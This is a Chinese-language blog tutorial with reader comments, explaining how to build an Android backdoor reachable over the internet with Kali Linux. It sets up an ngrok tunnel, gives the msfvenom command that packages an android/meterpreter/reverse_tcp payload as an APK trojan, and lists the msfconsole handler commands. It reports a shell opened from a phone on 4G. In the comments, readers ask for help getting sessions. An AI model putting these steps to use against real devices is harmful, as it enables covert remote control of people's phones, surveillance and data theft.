逍遥子

kali制作外网shell
配置外网环境我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。远程端口随便填(反正...
扫描右侧二维码阅读全文
13
2019/06

kali制作外网shell

配置外网环境

我这里用的是http://www.ngrok.cc其他的自行试用 这个可以免费 。
QQ截图20190613163138.png
远程端口随便填(反正你填啥都会提示你端口已被使用:)) 本地端口填写你的kali ip地址 也就是攻击机的地址 端口随意 不懂4444即可!
填写完后效果如下:
QQ截图20190613161750.png
然后点击开通

下载客户端

根据你kali的版本下载
我的是64位的。
QQ截图20190613161817.png

运行客户端

先看看你的clientid
隧道管理——隧道ip中查看,如图:
QQ截图20190613163651.png
记录好id后,运行下面命令

./sunny clientid 你的id

88.png

查看外网的ip

我们ping下赠送域名的ip地址
99.png
得到ip地址
999.png

制作外网shell

msfvenom -p android/meterpreter/reverse_tcp LHOST=外网ip LPORT=外网端口 R > 666.apk

**ps:**外网ip就是刚才ping出来的域名的ip地址,外网端口,就是你在添加隧道的时候,设置的端口。
d.png
生成之后,配置msf

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 内网ip
set LPORT 内网端口
exploit

填坑:
生成木马的时候,用的是外网ip和端口。配置msf的时候,我们用内网的ip和端口(很重要)
完成后,手机连接4G网络,运行木马。成功得到shell
shell.png
看看手机的ip地址
ip1.png

809626_WN67BUDJUQSWXG5.jpg

Last modification:June 18th, 2019 at 02:58 pm
正在沿街乞讨中……

Leave a Comment

7 comments

  1. hello Firefox 68.0 Windows 10 中国 北京 北京

    为什么。。按照你关于安卓后门的教程。。都收不到session 但感觉我操作又没有问题

    1. 逍遥子 小米 10.9.2 Linux 中国 北京 北京
      @hello

      IP地址是kali的IP

    2. 逍遥子 小米 10.9.2 Linux 中国 北京 北京
      @hello

      局域网的话要在同一网段!

      1. hello Firefox 68.0 Windows 10 中国 北京 北京
        @逍遥子
        该评论仅登录用户及评论双方可见
        1. 逍遥子 Google Chrome 72.0.3626.121 Windows 7 中国 山东 青岛
          @hello

          看看ip地址配置是否有误!

  2. ou 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM

    优秀了

    1. 南城以北青如衫 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM
      @ou

      感谢支持